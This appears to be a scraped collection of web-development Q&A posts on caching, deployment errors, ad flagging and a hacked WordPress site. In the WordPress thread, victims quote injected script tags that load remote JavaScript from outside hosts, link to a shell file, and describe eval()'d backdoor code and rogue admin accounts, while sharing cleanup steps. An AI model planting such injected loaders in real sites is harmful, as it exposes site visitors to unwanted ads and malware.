Recently we attempted to advertise our website via google ads. However, we got a reply regarding "malicious links" that should be removed from our website. Said files (.js) are, in fact, just chucks of the NextJs build located under /_next/static/chucks/.
Has anyone experienced this issue before? I assume that their crawler labeled these .js chunks as malicious for some reason, but many of the files they linked are simply small chunks containing a single line of code.
Here is an example of such a (one-liner) file:
(window.webpackJsonp_N_E=window.webpackJsonp_N_E||[]).push([[10],[]]);
Obviously, deleting these files would cause the website to cease working. We explained as much but they told us that there was nothing that could be done unless we delete these files.
Am I missing something obvious here?
Related
This is a long shot, but I came to a wall and I don't have any idea what to do with it.
There is a site that has section with Google Maps map with custom pins. Location of the pins and configuration of the map are defined in wp-content/themes/mytheme/js/map.js file. I have to add some pins. According to the person who created the site a couple of years ago, new pins may be added by modifying map.js file.
The problem is - nothing changes when I modify this file. Even better - I can remove this file (and all other scripts in "js" folder) and nothing changes. This is the only instance of a script that I found.
There isn't any caching plugin enabled.
There isn't caching on server.
This is not browser cache.
Basically it seems like instead of loading this script, the site is taking it from different location, but I don't have a clue where it could be. Is there anything I can do to find source location of a script?
EDIT: I deleted all css and js folders entirely from FTP and it still shows in browsers. I entered Chrome web tools and used network tab to see initiator for the script and it shows as
xxxxxxxxxxx.xx/wp-content/themes/xxxxxxxxxx/js/map.js?ver=5.2.10
But this file DOES NOT EXIST. I deleted it via FTP. Same thing happens with CSS files. It isn't browser caching because it happens on different browsers, different computers...
Just noticed ads appearing on one of our Wordpress sites. Nailed it down to these scripts being injected into the top of every page:
<script language="javascript" type="text/javascript" src="http://www.mde86.org/jquery.min.Js"></script><div style="display:none"><script language="javascript" type="text/javascript" src="http://js.users.51.la/18658151.js"></script>
Been looking at all the files and database for hours and can't figure out what is injecting it or how it got there.
What we found so far:
Some random lines in the function.php that were handling posts /
gets. We removed those but that didn't seem to solve the issue.
We found a wordpress user that no one has apparently created. So we removed that.
Reset all passwords on wordpress and FTP access
When we load a copy of the site on our local setup it doesn't display the ads or load the scripts... Almost like it can detect / target the live site?
But we still can't find where or how the script is being injected.
Any help greatly appreciated.
Someone had a similar issue here but unfortunately removed their post so only the cached remains:
http://webcache.googleusercontent.com/search?q=cache:US-HRpncY-QJ:stackoverflow.com/questions/33398784/script-being-injected-into-the-top-of-all-my-wordpress-page+&cd=1&hl=en&ct=clnk&gl=au
The same thing happened to a client of mine in the last 24 hours or so.
Can you share some information about the plugins you use and wordpress version?
The file influencing this is wp-admin/setup-config.php. It has encrypted bash code. I also found two admin users generated in wp_users. I think it's obvious that it's an automated attack, but it's pretty sophisticated.
I found the code on some random website via google search. You can review it here: http://tmp.mongit.com/tools/core.txt - It seems to be a shell file, but I'm not really smart when it comes to websec.
On my client's server I also found crap in a root /tmp/ folder (cPanel) that was being somehow accessed by wp_redirect (referenced in pluggable.php line 1196). These files are holding some MySQL info and WP database queries in JSON format. Not really sure how and why these files exist.
[29-Oct-2015 02:45:59 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/xxx/public_html/wp-admin/setup-config.php(514) : eval()'d code(1) : eval()'d code:2) in /home/xxx/public_html/wp-includes/pluggable.php on line 1196
Try to narrow down the injection source.
Disable plugins one at a time
Switch to a different theme
Check .htaccess files
Test against server generated injections
Test against browser generated injections
had the same issue few hours ago.
Finally found at root wordpress "index.php" at first line injected script calling, the script is calling a file at same directory, the name staretd with .xxxxx like a .htaccess, so it's hidden for example in TCMD.
Cleared the line and deleted the file, now all ok.
But how the hell somebody could control index.pho I don't know....
i am currently hosting my site on justhost (just as a test server), when i save my work on my local computer through aptana the files are automatically uploaded to the hosting server, and they appear fine. However this only works for my actual files like .php and .html
They do not work for my .css files, so if i save them and upload them the changes do not take effect, until like the next day, or if i turn my computer on and off and leave it a couple of hours, i am not sure why they are not taking effect immediately like the rest of the fiels.
I have tried deleting my cache and adding ?ver=1.0 to the end of the file name, but still no luck.
Also, i checked the hosting directly and the css file has updated to the correct version, but just does not show in browser.
Any ideas on what could be wrong, it would make life much easier if i could get them updating like the other files.
Thanks
I can't be sure what is causing this, but if I'm correct - the files do upload, its not a case of not uploading. It's one of these things
The Cache is holding it (already cleared it though?)
The file is doing some odd cross server transfer, depends what sort of hosting your on, but it may be the file is getting held up somewhere
Try clearing the DNS Cache
Start > type CMD > in the dialog type:
ipconfig /flushdns
That may force the computer to reload the file.
As for an ongoing solution to prevent it in the future I'm out...
I know it has been a while, but as others may find this question the way I did, the solution for me was to enable Cloudflare Developer Mode. Cloudflare was keeping the css files in cache and it drove me crazy to find the solution in another forum. I hope your case may be the same as mine as thus you can solve it as well.
Hi I have a problem with uploading files to my server through an admin system. I myself do not really work with ASP scripting much, so I don't understand the problem.
When uploading files like thumbnails there seems to be no problem with the script, but when trying to upload the bigger images it does not work and gives me an Internal server error 500 (There is a problem with the resource you are looking for, and it cannot be displayed.)
The loading script that is used is call LOADER.ASP and as said before using small files, the script uploads fine and all entries are made into the the database just fine.
If anyone could just give me a hint to why this might happen or what could be the cause for giving the error it woulds realy help
Thank you
I just redeployed one of my sites today and suddenly some (but not all) of my .aspx files are redirecting to my 404 handler.
I've scrutinized the security settings on the offending files, comparing them line-by-line with other .aspx files that are serving correctly, with no luck.
The files 404'ing files were indeed ones I had been working on, and were replaced during the deploy. But then again, some of the other files I was working on are coming up fine. Naturally, the changes were not the sort of thing that would cause the errors I'm seeing, and the site runs perfectly in my dev environment.
Any idea what could be causing this?
ANSWER: User Error (as always)
Looks like my deploy script was skipping .ascx files. (One of the minor changes between last deploy and this one was adding a couple usercontrols.) The page would start loading, look for its UserControls, not find them, and throw a 404.
Thanks all for the sympathy. Sorry to waste your time. Hopefully this will at least help the next guy who fat-fingers a deploy script and gets a non-helpful error message.
Maybe you've already done this, but as you stated you had been recently working on those files, I would start by verifying that the links to the offending pages are correct in the source - check that their declared path is (works out to be) indeed valid. I try and make all links relative with Server.MapPath or something similar, but occasionally one slips my mind.